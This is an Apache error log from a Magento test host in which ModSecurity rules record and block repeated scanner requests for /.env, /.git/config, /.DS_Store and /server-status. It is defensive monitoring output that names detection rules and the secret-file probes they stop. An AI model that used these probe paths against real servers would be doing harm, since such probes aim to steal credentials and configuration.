[Fri Nov 14 08:09:12.599677 2025] [:error] [pid 56425] [client 157.230.19.140:41534] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRbVmCHeh2EO446Dj0Gx8QAAAAM"]
[Sun Nov 16 07:40:45.570290 2025] [authz_core:error] [pid 105733] [client 139.59.143.102:57992] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Nov 16 07:40:48.000693 2025] [:error] [pid 107823] [client 139.59.143.102:48536] [client 139.59.143.102] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRlx72ZlvYqdbt58w-ZoFwAAABA"]
[Sun Nov 16 07:40:48.000914 2025] [:error] [pid 107823] [client 139.59.143.102:48536] [client 139.59.143.102] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRlx72ZlvYqdbt58w-ZoFwAAABA"]
[Sun Nov 16 07:40:48.001071 2025] [:error] [pid 107823] [client 139.59.143.102:48536] [client 139.59.143.102] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRlx72ZlvYqdbt58w-ZoFwAAABA"]
[Sun Nov 16 07:40:49.091066 2025] [:error] [pid 107828] [client 139.59.143.102:48552] [client 139.59.143.102] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRlx8QaGB4X_k38GFDAM2wAAAAE"]
[Sun Nov 16 07:40:49.091292 2025] [:error] [pid 107828] [client 139.59.143.102:48552] [client 139.59.143.102] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRlx8QaGB4X_k38GFDAM2wAAAAE"]
[Sun Nov 16 07:40:49.091444 2025] [:error] [pid 107828] [client 139.59.143.102:48552] [client 139.59.143.102] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRlx8QaGB4X_k38GFDAM2wAAAAE"]
[Sun Nov 16 07:40:51.838230 2025] [:error] [pid 106193] [client 139.59.143.102:48556] [client 139.59.143.102] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRlx8xmZz13emZeNiG2uJwAAAAg"]
[Sun Nov 16 07:40:51.838480 2025] [:error] [pid 106193] [client 139.59.143.102:48556] [client 139.59.143.102] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRlx8xmZz13emZeNiG2uJwAAAAg"]
[Sun Nov 16 07:40:51.838645 2025] [:error] [pid 106193] [client 139.59.143.102:48556] [client 139.59.143.102] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRlx8xmZz13emZeNiG2uJwAAAAg"]
[Sun Nov 16 09:17:23.833500 2025] [authz_core:error] [pid 107792] [client 142.93.143.8:35726] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Nov 16 09:17:24.927485 2025] [:error] [pid 107820] [client 142.93.143.8:35748] [client 142.93.143.8] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRmIlPLZMBXPlnztbf7AAgAAAAw"]
[Sun Nov 16 09:17:24.927715 2025] [:error] [pid 107820] [client 142.93.143.8:35748] [client 142.93.143.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRmIlPLZMBXPlnztbf7AAgAAAAw"]
[Sun Nov 16 09:17:24.927874 2025] [:error] [pid 107820] [client 142.93.143.8:35748] [client 142.93.143.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRmIlPLZMBXPlnztbf7AAgAAAAw"]
[Sun Nov 16 09:17:25.735093 2025] [:error] [pid 106193] [client 142.93.143.8:35762] [client 142.93.143.8] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRmIlRmZz13emZeNiG2uLgAAAAg"]
[Sun Nov 16 09:17:25.735322 2025] [:error] [pid 106193] [client 142.93.143.8:35762] [client 142.93.143.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRmIlRmZz13emZeNiG2uLgAAAAg"]
[Sun Nov 16 09:17:25.735499 2025] [:error] [pid 106193] [client 142.93.143.8:35762] [client 142.93.143.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRmIlRmZz13emZeNiG2uLgAAAAg"]
[Sun Nov 16 09:17:26.150056 2025] [:error] [pid 107818] [client 142.93.143.8:35776] [client 142.93.143.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRmIljaZzEQZDCScevejawAAAAk"]
[Sun Nov 16 09:17:26.150319 2025] [:error] [pid 107818] [client 142.93.143.8:35776] [client 142.93.143.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRmIljaZzEQZDCScevejawAAAAk"]
[Sun Nov 16 09:17:26.150546 2025] [:error] [pid 107818] [client 142.93.143.8:35776] [client 142.93.143.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRmIljaZzEQZDCScevejawAAAAk"]
[Tue Nov 18 09:58:20.565014 2025] [authz_core:error] [pid 160877] [client 64.23.218.208:50036] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Tue Nov 18 09:58:22.199618 2025] [:error] [pid 160354] [client 64.23.218.208:34198] [client 64.23.218.208] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRw1LouBaeU2W18KgNtfrQAAAAs"]
[Tue Nov 18 09:58:22.199874 2025] [:error] [pid 160354] [client 64.23.218.208:34198] [client 64.23.218.208] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRw1LouBaeU2W18KgNtfrQAAAAs"]
[Tue Nov 18 09:58:22.200039 2025] [:error] [pid 160354] [client 64.23.218.208:34198] [client 64.23.218.208] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRw1LouBaeU2W18KgNtfrQAAAAs"]
[Tue Nov 18 09:58:22.700300 2025] [:error] [pid 153863] [client 64.23.218.208:34212] [client 64.23.218.208] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRw1Luo53hvRBsk5IfbhHAAAAAA"]
[Tue Nov 18 09:58:22.700528 2025] [:error] [pid 153863] [client 64.23.218.208:34212] [client 64.23.218.208] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRw1Luo53hvRBsk5IfbhHAAAAAA"]
[Tue Nov 18 09:58:22.700708 2025] [:error] [pid 153863] [client 64.23.218.208:34212] [client 64.23.218.208] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRw1Luo53hvRBsk5IfbhHAAAAAA"]
[Tue Nov 18 09:58:23.199767 2025] [:error] [pid 160901] [client 64.23.218.208:34214] [client 64.23.218.208] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRw1Lx54imVYfbO8_klVHAAAAAU"]
[Tue Nov 18 09:58:23.200013 2025] [:error] [pid 160901] [client 64.23.218.208:34214] [client 64.23.218.208] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRw1Lx54imVYfbO8_klVHAAAAAU"]
[Tue Nov 18 09:58:23.200175 2025] [:error] [pid 160901] [client 64.23.218.208:34214] [client 64.23.218.208] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRw1Lx54imVYfbO8_klVHAAAAAU"]
[Thu Nov 20 09:20:12.409321 2025] [authz_core:error] [pid 202072] [client 206.81.24.227:42896] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Thu Nov 20 09:20:14.395503 2025] [:error] [pid 202060] [client 206.81.24.227:42922] [client 206.81.24.227] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aR7PPnKrPyMVmNJcOn2PFQAAAAQ"]
[Thu Nov 20 09:20:14.395735 2025] [:error] [pid 202060] [client 206.81.24.227:42922] [client 206.81.24.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aR7PPnKrPyMVmNJcOn2PFQAAAAQ"]
[Thu Nov 20 09:20:14.395920 2025] [:error] [pid 202060] [client 206.81.24.227:42922] [client 206.81.24.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aR7PPnKrPyMVmNJcOn2PFQAAAAQ"]
[Thu Nov 20 09:20:14.974735 2025] [:error] [pid 202064] [client 206.81.24.227:42928] [client 206.81.24.227] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aR7PPjc2vfH3KLwY-1J3xgAAAAc"]
[Thu Nov 20 09:20:14.974975 2025] [:error] [pid 202064] [client 206.81.24.227:42928] [client 206.81.24.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aR7PPjc2vfH3KLwY-1J3xgAAAAc"]
[Thu Nov 20 09:20:14.975139 2025] [:error] [pid 202064] [client 206.81.24.227:42928] [client 206.81.24.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aR7PPjc2vfH3KLwY-1J3xgAAAAc"]
[Thu Nov 20 09:20:15.944077 2025] [:error] [pid 202059] [client 206.81.24.227:42940] [client 206.81.24.227] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aR7PPx7fuMl7H-wLIaE49QAAAAM"]
[Thu Nov 20 09:20:15.944301 2025] [:error] [pid 202059] [client 206.81.24.227:42940] [client 206.81.24.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aR7PPx7fuMl7H-wLIaE49QAAAAM"]
[Thu Nov 20 09:20:15.944484 2025] [:error] [pid 202059] [client 206.81.24.227:42940] [client 206.81.24.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aR7PPx7fuMl7H-wLIaE49QAAAAM"]
[Fri Nov 21 12:42:42.186624 2025] [authz_core:error] [pid 229750] [client 167.172.158.128:50258] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Nov 21 12:42:43.152918 2025] [:error] [pid 229752] [client 167.172.158.128:50272] [client 167.172.158.128] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSBQMwtxB2W0q-9lM_xsHQAAAAk"]
[Fri Nov 21 12:42:43.153157 2025] [:error] [pid 229752] [client 167.172.158.128:50272] [client 167.172.158.128] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSBQMwtxB2W0q-9lM_xsHQAAAAk"]
